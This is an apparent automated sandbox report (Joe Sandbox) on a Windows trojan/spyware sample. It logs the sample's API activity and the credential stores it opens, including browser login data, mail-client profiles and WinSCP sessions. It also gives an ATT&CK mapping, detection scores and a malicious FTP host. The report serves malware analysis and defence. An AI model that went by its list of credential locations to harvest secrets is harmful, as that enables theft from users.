          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exe | Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Users\user\Desktop\Q4YODvoYjL.exe VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\Desktop\Q4YODvoYjL.exeCode function: 1_2_00D7F610 GetUserNameW,

          Stealing of Sensitive Information

Source: Yara match File source: 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Q4YODvoYjL.exe PID: 352, type: MEMORYSTR
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Q4YODvoYjL.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: Yara match File source: 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Q4YODvoYjL.exe PID: 352, type: MEMORYSTR

          Remote Access Functionality

Source: Yara match File source: 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Q4YODvoYjL.exe PID: 352, type: MEMORYSTR
MITRE ATT&CK matrix (one row per line; the digit groups preceding a technique are the report's match-count badges for that technique):

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 211 Windows Management Instrumentation | Path Interception | 111 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 111 Security Software Discovery | Remote Services | 1 Email Collection | 1 Exfiltration Over Alternative Protocol | 11 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | 1 Credentials in Registry | 131 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 131 Virtualization/Sandbox Evasion | Security Account Manager | 1 Application Window Discovery | SMB/Windows Admin Shares | 1 Data from Local System | Automated Exfiltration | 1 Ingress Tool Transfer | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 111 Process Injection | NTDS | 1 Account Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 2 Non-Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 System Owner/User Discovery | SSH | Keylogging | Data Transfer Size Limits | 23 Application Layer Protocol | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 2 Software Packing | Cached Domain Credentials | 1 Remote System Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 114 System Information Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
Source | Detection | Scanner | Label | Link
Q4YODvoYjL.exe | 31% | ReversingLabs | Win32.Trojan.Generic |
Q4YODvoYjL.exe | 38% | Virustotal | | Browse
Q4YODvoYjL.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
Source | Detection | Scanner | Label | Link | Download
1.2.Q4YODvoYjL.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1203035 | | Download File
Source | Detection | Scanner | Label | Link
ftp.valvulasthermovalve.cl | 13% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
http://ftp.valvulasthermovalve.cl | 100% | URL Reputation | phishing |
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
http://www.tiro.com | 0% | URL Reputation | safe |
http://www.goodfont.co.kr | 0% | URL Reputation | safe |
http://www.carterandcone.coml | 0% | URL Reputation | safe |
http://www.sajatypeworks.com | 0% | URL Reputation | safe |
http://www.typography.netD | 0% | URL Reputation | safe |
http://www.typography.netD | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
http://fontfabrik.com | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
http://www.sandoll.co.kr | 0% | URL Reputation | safe |
http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
http://www.sakkal.com | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api4.ipify.org | 173.231.16.76 | true | false | | high
ftp.valvulasthermovalve.cl | 190.107.177.239 | true | true | | unknown
api.ipify.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designersG | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ftp.valvulasthermovalve.cl | Q4YODvoYjL.exe, 00000001.00000002.563968449.0000000002A6C000.00000004.00000800.00020000.00000000.sdmp, Q4YODvoYjL.exe, 00000001.00000002.563968449.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: phishing | unknown
http://www.fontbureau.com/designers/? | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.tiro.com | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe, URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe, URL Reputation: safe | unknown
https://api.ipify.org | Q4YODvoYjL.exe, 00000001.00000002.563968449.00000000029F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://fontfabrik.com | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fonts.com | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Q4YODvoYjL.exe, 00000001.00000002.563968449.00000000029F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | Q4YODvoYjL.exe, 00000000.00000002.353556587.0000000006D62000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
190.107.177.239 | ftp.valvulasthermovalve.cl | Chile | 265831 | SOCCOMERCIALWIRENETCHILELTDACL | true
173.231.16.76 | api4.ipify.org | United States | 18450 | WEBNXUS | false
Joe Sandbox Version: 37.0.0 Beryl
Analysis ID: 830848
Start date and time: 2023-03-20 18:31:07 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 41s
Hypervisor based Inspection enabled: false
Report type: light
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: Q4YODvoYjL.exe
Original Sample Name: e30c67b19383f259d7414b763049eb2f.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/1@3/2
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size getting too big: too many NtAllocateVirtualMemory calls found
• Report size getting too big: too many NtOpenKeyEx calls found
• Report size getting too big: too many NtProtectVirtualMemory calls found
• Report size getting too big: too many NtQueryValueKey calls found
                                        Time     | Type            | Description
                                        18:32:16 | API Interceptor | 1x Sleep call for process: Q4YODvoYjL.exe modified
                                        No context
                                        Process:C:\Users\user\Desktop\Q4YODvoYjL.exe
                                        File Type:ASCII text, with CRLF line terminators
